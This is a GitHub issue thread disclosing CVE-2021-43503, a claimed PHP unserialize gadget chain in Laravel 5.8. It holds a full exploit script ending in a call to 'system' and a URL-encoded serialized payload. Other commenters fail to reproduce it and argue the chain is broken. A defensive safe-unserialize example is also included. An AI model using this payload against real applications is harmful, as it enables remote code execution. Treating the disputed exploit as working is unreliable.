guoyanan1g / Laravel-vul

A vulnerability I found myself: CVE-2021-43503

There is an unserialize POP vulnerability that can RCE #2

Open guoyanan1g opened 2 years ago

guoyanan1g commented 2 years ago

There is a PHP unserialize POP chain. The files and the functions are: ① laravel5.8\vendor\laravel\framework\src\Illuminate\Routing\PendingResourceRegistration.php, __destruct() ② laravel5.8\vendor\laravel\framework\src\Illuminate\Queue\Capsule\Manager.php, __call() ③ laravel5.8\vendor\mockery\mockery\library\Mockery\ClosureWrapper.php, __invoke(). The exp is:

<?php

namespace Illuminate\Routing{
    class PendingResourceRegistration{
        protected $registrar;
        protected $name;
        protected $controller;
        protected $options = [];
        protected $registered = false;
        public function __construct($b){
            $this->registrar=$b;
        }
    }
}

namespace Illuminate\Queue\Capsule{
    class Manager{
        protected $manager;
        public function __construct($c)
        {
            $this->manager->method=$c;
        }

    }
}

namespace Mockery{
    class ClosureWrapper{
        private $closure;
        public function __construct(){
            $this->closure="system";
        }
    }
}

namespace{

    use Illuminate\Queue\Capsule\Manager;
    use Illuminate\Routing\PendingResourceRegistration;
    use Mockery\ClosureWrapper;

    $c=new ClosureWrapper("dir");
    $b=new Manager($c);
    $a=new PendingResourceRegistration($b);

    print(urlencode(serialize($a)));
}

//O%3A46%3A%22Illuminate%5CRouting%5CPendingResourceRegistration%22%3A5%3A%7Bs%3A12%3A%22%00%2A%00registrar%22%3BO%3A32%3A%22Illuminate%5CQueue%5CCapsule%5CManager%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00manager%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22method%22%3BO%3A22%3A%22Mockery%5CClosureWrapper%22%3A1%3A%7Bs%3A31%3A%22%00Mockery%5CClosureWrapper%00closure%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7Ds%3A7%3A%22%00%2A%00name%22%3BN%3Bs%3A13%3A%22%00%2A%00controller%22%3BN%3Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A0%3A%7B%7Ds%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3B%7D

ellgreen commented 2 years ago

Hi @guoyanan1g, does this only affect Laravel 5?

guoyanan1g commented 2 years ago

I haven't tested the lower versions, maybe you can try to find out if these functions are in the lower versions 😂

ellgreen commented 2 years ago

Sorry, I was talking about the higher versions, we're currently using Laravel 8

guoyanan1g commented 2 years ago

I think it can't...

PinkieChen commented 2 years ago

Hi @guoyanan1g, I have some trouble when reproducing the vulnerability.

1. Why is it showing this error? [image]

2. $c=new ClosureWrapper("dir"); why doesn't the payload have "dir"? [image]

ellgreen commented 2 years ago

Hi @PinkieChen, there is a similar CVE here: https://github.com/1nhann/vulns/issues/1

The comments hold a bit more information about replicating the issue, but seems to boil down to not unserialising unvalidated user input which is advised against by PHP already:

[image]

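
The advice quoted above (never unserialize unvalidated input) can be enforced at the sink itself. The following is an added example, not code from this issue, from Laravel or from Mockery: it unserializes with allowed_classes disabled, so none of the gadget classes in the chain above (PendingResourceRegistration, Manager, ClosureWrapper) are ever instantiated and no __destruct, __call or __invoke can run, then rejects the whole payload if any object was present. The function names and sample inputs are assumptions constructed for this example.

```php
<?php
// Added example (not from the issue, Laravel or Mockery): a sink that must
// call unserialize() on untrusted input but refuses every object, so a POP
// chain like PendingResourceRegistration -> Manager -> ClosureWrapper is
// never built. Requires PHP >= 7.0 for the allowed_classes option.

function rejectObjects($value, string $path = '$'): void
{
    // With allowed_classes => false every object arrives as
    // __PHP_Incomplete_Class; walk the result and refuse the payload if
    // any object survived at any depth.
    if (is_object($value)) {
        $props = (array) $value;
        $name  = $props['__PHP_Incomplete_Class_Name'] ?? get_class($value);
        throw new UnexpectedValueException(
            "object of class {$name} at {$path} is not allowed");
    }
    if (is_array($value)) {
        foreach ($value as $k => $v) {
            rejectObjects($v, $path . '[' . $k . ']');
        }
    }
}

function safeUnserialize(string $data)
{
    // Never let unserialize() construct real classes from this input.
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== 'b:0;') {
        throw new UnexpectedValueException('malformed serialized data');
    }
    rejectObjects($value);
    return $value; // only scalars and arrays reach the caller
}

// Constructed inputs: a benign array, and an object graph that names two of
// the classes from the chain above (the classes are not loaded here).
$benign  = 'a:2:{s:4:"user";s:5:"alice";s:3:"qty";i:3;}';
$hostile = 'a:1:{s:4:"cart";O:32:"Illuminate\Queue\Capsule\Manager":1:{'
         . 's:10:"' . "\0*\0" . 'manager";O:22:"Mockery\ClosureWrapper":0:{}}}';

var_dump(safeUnserialize($benign));
try {
    safeUnserialize($hostile);
} catch (UnexpectedValueException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Running it prints the benign array and then a rejection naming Illuminate\Queue\Capsule\Manager at $[cart]; the nested gadget never gets a chance to load.
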
guoyanan1g commented 2 years ago

Sorry, the exp is just an example showing the caller/callee relationship and the order. You can view it as a reference, please don't use it as a payload directly.

kang8 commented 2 years ago

Hi @guoyanan1g,

I think the exp you gave is wrong and cannot be reproduced locally.

The problem is that $this->manager->method (especially method) in Manager's __construct() has no effect:

namespace Illuminate\Queue\Capsule{
    class Manager{
        protected $manager;
        public function __construct($c)
        {
            $this->manager->method=$c; // This line
        }
    }
}

In Laravel 5.8, Manager's __call() code is as follows:

public function __call($method, $parameters)
{
    return $this->manager->$method(...$parameters);
}

In your exp example, the value of $method is register in the POP chain, and there is no register() function in ClosureWrapper, nor in the exp example you gave. When you set $this->manager->method=$c, I don't know what the intention is here.

I created a repo (https://github.com/kang8/CVE-2021-43503) to prove this. If you can create a directory (like hello/) with RCE, please send a PR to prove it.

sudheeshms commented 2 years ago

@guoyanan1g, @kang8 One doubt: is it necessary that the dependent package (in this case, mockery) be available on the server in order to exploit this vulnerability?

Thanks in advance.

kang8 commented 2 years ago

In fact, I can't even reproduce the vulnerability.